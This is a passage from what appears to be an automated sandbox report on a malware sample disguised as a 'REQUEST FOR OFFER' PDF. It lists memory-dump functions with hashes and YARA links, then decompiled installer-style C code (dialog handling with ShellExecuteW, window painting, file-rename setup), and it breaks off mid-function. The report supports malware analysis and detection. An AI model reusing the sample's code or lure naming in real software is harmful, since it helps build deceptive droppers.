Uniqueness

Uniqueness Score: -1.00%

Function 032D5A43 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

|`Q, xrefs: 032D5ACF

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: |`Q
API String ID: 0-1493779072
Opcode ID: abc326e2872beaebf5e3ea0c1967ce607ef8facbd04be7972c75ee8e43f97787
Instruction ID: 3f9fc1eea161ae15d160886fa9515d8ce0c7c639c6a6cfb476c17162434b022c
Opcode Fuzzy Hash: abc326e2872beaebf5e3ea0c1967ce607ef8facbd04be7972c75ee8e43f97787
Instruction Fuzzy Hash: 97910631608B99CFDF35DF34CD953DA3BA2AF52310F99416ACC4A9B645D3B05682CB06

Uniqueness

Uniqueness Score: -1.00%

Function 032D5C06 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

|`Q, xrefs: 032D5ACF

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: |`Q
API String ID: 0-1493779072
Opcode ID: b5260d8ed752779071eb761984296945bb31b68dc8dba9857241b7807a03450f
Instruction ID: 63fb1866dbafb95ae73e7a706044964bd09588a392f3d32e37f6dfe18bb7d39e
Opcode Fuzzy Hash: b5260d8ed752779071eb761984296945bb31b68dc8dba9857241b7807a03450f
Instruction Fuzzy Hash: 71911631608B99CFDF35DF34CD943DA3BA2AF92310F59412ACC4A9B245D3B05682CB06

Uniqueness

Uniqueness Score: -1.00%

Function 032D5B37 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

|`Q, xrefs: 032D5ACF

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: |`Q
API String ID: 0-1493779072
Opcode ID: d66083e57c8a18c1edfff5fcfeb822fdf9fec285b326c263d83459bf5faeb46a
Instruction ID: bf37f5b8f0e6e9009db734ceeff2419402e046751ff1d0c7f3f6fa45412ea32a
Opcode Fuzzy Hash: d66083e57c8a18c1edfff5fcfeb822fdf9fec285b326c263d83459bf5faeb46a
Instruction Fuzzy Hash: 4F91F531608B9ACFDF35DF34CD953DA3BA2AF92310F59412ACC4A9B245D3B15682CB45

Uniqueness

Uniqueness Score: -1.00%

Function 032D17BD Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

:Q, xrefs: 032D181E

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: :Q
API String ID: 0-1416432604
Opcode ID: 9baaf57f557b544a3890e65428545e2a3a15f46d9518ea5148a9d8cf4fbd9a7d
Instruction ID: ee508f4a82c57ea72d4f38d483536b198d53edba513b6364fb0273012f58705b
Opcode Fuzzy Hash: 9baaf57f557b544a3890e65428545e2a3a15f46d9518ea5148a9d8cf4fbd9a7d
Instruction Fuzzy Hash: 3151AE69710303CFDF28DA3881F0BF627965F63294B59897FDD86CB265EB2184C9C641

Uniqueness

Uniqueness Score: -1.00%

Function 032EC892 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

^k-G, xrefs: 032EC8CA

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: ^k-G
API String ID: 823142352-2256932240
Opcode ID: bf11265be502577362479e85b3b9eb3f4c988191100ceeaa84323c82dc434632
Instruction ID: 15731be6355f38c22982aeea31052c62d1a5d7e982ebc02351192a10b1d61905
Opcode Fuzzy Hash: bf11265be502577362479e85b3b9eb3f4c988191100ceeaa84323c82dc434632
Instruction Fuzzy Hash: 6D41E77571135A4FEF34EE398AB13EF62A6EF40380F46442DDC8B9B204DB74CA818641

Uniqueness

Uniqueness Score: -1.00%

Function 032EE6AB Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

2&, xrefs: 032EE70F

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: 2&
API String ID: 0-2124727155
Opcode ID: fb1e72c3c7e880d7b823fe35bbe714975372d5b5b1537c9e4d61729e97bdf072
Instruction ID: b4652e9da6dad8665fd212615b6a4da383488408cb83e85bbacfdd5fbc6949bb
Opcode Fuzzy Hash: fb1e72c3c7e880d7b823fe35bbe714975372d5b5b1537c9e4d61729e97bdf072
Instruction Fuzzy Hash: 9221D53539538A9BCB28DE68D8E17DA33A2FF1A740F85411DDC868B251E3B54586CA05

Uniqueness

Uniqueness Score: -1.00%

Function 032D727E Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0446b1f5652aa1b768568ba0f3f8a8bb4dafafc6b6136b91a24a64011c724ba2
Instruction ID: 3644a7dbd9e1dbbbbec3ecd8a7760cf877cda3b7c2f8d9bc7d747b388ef80eb3
Opcode Fuzzy Hash: 0446b1f5652aa1b768568ba0f3f8a8bb4dafafc6b6136b91a24a64011c724ba2
Instruction Fuzzy Hash: 55C1543160034A9FDB34DE388DA57EA3BE6EF95390F85422EDC89DB244D3358986CA41

Uniqueness

Uniqueness Score: -1.00%

Function 032D7306 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5ffbdf80613b2c33df8abcaa5fe3fa57e2e36d86c1f3f7489044312b5e4a32
Instruction ID: db2f647b3aeddb20816307ebe3719fe16165f316e61cac7c41c27a711f0350b5
Opcode Fuzzy Hash: 2c5ffbdf80613b2c33df8abcaa5fe3fa57e2e36d86c1f3f7489044312b5e4a32
Instruction Fuzzy Hash: E1A13D3260075A9FDF35DE388CA47EA3BE6EF56350F99412ADC89D7244D3709A82C741

Uniqueness

Uniqueness Score: -1.00%

Function 032D6221 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ace077b4888c0a464167b0262562682f97ae9a169b8421d512ae9a8eabde04f
Instruction ID: 5b542c477b06eac52877002951cdc076825e633310fcdd388fb0a88c4b30cf59
Opcode Fuzzy Hash: 6ace077b4888c0a464167b0262562682f97ae9a169b8421d512ae9a8eabde04f
Instruction Fuzzy Hash: 32813472A1478A9FDB20EF24DC547EA3BA2EF55350FDA4459DC8ACB604D6708AC2CB41

Uniqueness

Uniqueness Score: -1.00%

Function 032D61DB Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866b4009d4d51d8b7e156f5afd4ca30762785932c68492f51b1c59f6b185f107
Instruction ID: 62c6c86c6c824d6b2bdce49e4398cf020827f0e3849c878f691dc5e643f33394
Opcode Fuzzy Hash: 866b4009d4d51d8b7e156f5afd4ca30762785932c68492f51b1c59f6b185f107
Instruction Fuzzy Hash: EC814672610799AFDF70EE24DC947EA37A2EF46350FCA4469DC8AC7644D6708AC2CB01

Uniqueness

Uniqueness Score: -1.00%

Function 032ECCDC Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbefd6b311e741f051ccb7dcd7e4b6f5e456139b13b040ddc2a23f00c213d1b5
Instruction ID: 7632f252d946f837d346bbee05b8299d71a736a8eb60ca1770e61732cd0e8b4d
Opcode Fuzzy Hash: cbefd6b311e741f051ccb7dcd7e4b6f5e456139b13b040ddc2a23f00c213d1b5
Instruction Fuzzy Hash: 20814575615346CFDB298F74C9513DA3BA2EFA3758FA8015ECC868B664D3324583CB42

Uniqueness

Uniqueness Score: -1.00%

Function 032D7430 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682a3b0eb59a66bf82e5f743d9d5d299f915c550f0d261efb0b2f3b9b47b82df
Instruction ID: f4b6bfbb251570ade7ff6e73abf528fbf626ec1ec0629ec9178aefb3696d983a
Opcode Fuzzy Hash: 682a3b0eb59a66bf82e5f743d9d5d299f915c550f0d261efb0b2f3b9b47b82df
Instruction Fuzzy Hash: BD61183261034A9FDF34CE298DA47EA37E7EF99350F95412ADC89DB244D3309A86CB45

Uniqueness

Uniqueness Score: -1.00%

Function 032D74FA Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d8b326d7deb87df6df6765f9b696fe0068165b6039a24bf901e37336c75ec1
Instruction ID: 7ff3cc961bcd6738538c921dd986521a5fed575bde5e981c1b0665b1fa8a928b
Opcode Fuzzy Hash: c8d8b326d7deb87df6df6765f9b696fe0068165b6039a24bf901e37336c75ec1
Instruction Fuzzy Hash: F15139322047999FDF319E388C947EA3BE2AF46350FDA4569CC8A9B685C37059C3C702

Uniqueness

Uniqueness Score: -1.00%

Function 032D7607 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b287ad6855739f3d389b9de9e94781d2805aec245c864a170e8d21919daeca0f
Instruction ID: ade4c8557e7631f70d527055b7e267fa0ca53ada431633fc8bea846bd70f3aec
Opcode Fuzzy Hash: b287ad6855739f3d389b9de9e94781d2805aec245c864a170e8d21919daeca0f
Instruction Fuzzy Hash: 0041D522604E996FDF629F248C403E93BD26F57361FCF65A8CDC69B689C2B055C3D602

Uniqueness

Uniqueness Score: -1.00%

Function 032EDAC1 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95985ff553cb9a8d40b71189436f0bf971c8ddb02dcfb6aeaf9830f514c1b003
Instruction ID: 2b0b03e3bb09d20ee63e6fa9fd8f2a29ccee8ff593d05c6bf62973f69c177c84
Opcode Fuzzy Hash: 95985ff553cb9a8d40b71189436f0bf971c8ddb02dcfb6aeaf9830f514c1b003
Instruction Fuzzy Hash: 50C09270251684CFC281DF09C2A4F8073AABB20B00BC15480F4418F999CB75EC41CB04

Uniqueness

Uniqueness Score: -1.00%

Function 032D6F6D Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00404473 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404473(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				short* _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216f4 =  *0x4216f4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040433D(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281e0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								ShellExecuteW(_a4, L"open", _v8, 0, 0, 1);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a248, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a248, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x422700; // 0x79c00c
						_t29 = _t69 + 0x14; // 0x79c020
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F8(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404706();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42921c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a278 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404424;
				if(_t110 != 2) {
					_v8 = E004043EA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004042D6(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004042D6(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F8( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040430B(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a250 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216f4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216f4 = 0;
				return 0;
			}

0x00404485
0x004045b2
0x0040460f
0x00404613
0x004046e8
0x004046ea
0x004046ea
0x004046f0
0x004046f0
0x004046f3
0x00000000
0x004046fa
0x00404621
0x00404627
0x00404631
0x0040463c
0x0040463f
0x00404642
0x0040464d
0x00404650
0x00404657
0x00404664
0x00404675
0x0040468a
0x00404699
0x0040469f
0x0040469f
0x00404657
0x004046a9
0x00000000
0x004046b4
0x004046b8
0x004046c8
0x004046c8
0x004046ce
0x004046da
0x004046da
0x00000000
0x004046de
0x004046a9
0x004045bd
0x00000000
0x004045cf
0x004045cf
0x004045d4
0x004045d4
0x004045da
0x00000000
0x00000000
0x00404603
0x00404605
0x0040460a
0x00000000
0x0040460a
0x004045bd
0x0040448b
0x0040448e
0x00404493
0x004044a4
0x004044a4
0x004044ac
0x004044af
0x004044b3
0x004044b6
0x004044ba
0x004044bd
0x004044c0
0x004044c3
0x004044ca
0x004044cc
0x004044cc
0x004044d6
0x004044e3
0x004044ed
0x004044f2
0x004044f5
0x004044fa
0x00404511
0x00404518
0x0040452b
0x0040452e
0x00404542
0x00404549
0x0040454e
0x00404553
0x00404553
0x00404561
0x0040456f
0x00404581
0x00404586
0x00404596
0x00404598
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
GetDlgItem.USER32(?,000003E8), ref: 00404525
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
GetSysColor.USER32(?), ref: 00404553
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
lstrlenW.KERNEL32(?), ref: 00404574
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
GetDlgItem.USER32(?,0000040A), ref: 004045EF
SendMessageW.USER32(00000000), ref: 004045F6
GetDlgItem.USER32(?,000003E8), ref: 00404621
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
LoadCursorW.USER32(00000000,00007F02), ref: 00404672
SetCursor.USER32(00000000), ref: 00404675
ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
LoadCursorW.USER32(00000000,00007F00), ref: 00404696
SetCursor.USER32(00000000), ref: 00404699
SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA

Strings

open, xrefs: 00404682
C@, xrefs: 0040467F
Call, xrefs: 00404650
N, xrefs: 0040460F

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open$C@
API String ID: 3615053054-3980584120
Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a250;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F41 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F41(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				WCHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyW(0x426dc8, L"NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameW( *(_t53 + 0x1c), 0x4275c8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
						_t54 = _t53 + 0x10;
						E00406234(_t38, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a250 + 0x128)));
						_t13 = E00405DE7(0x4275c8, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405E6A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
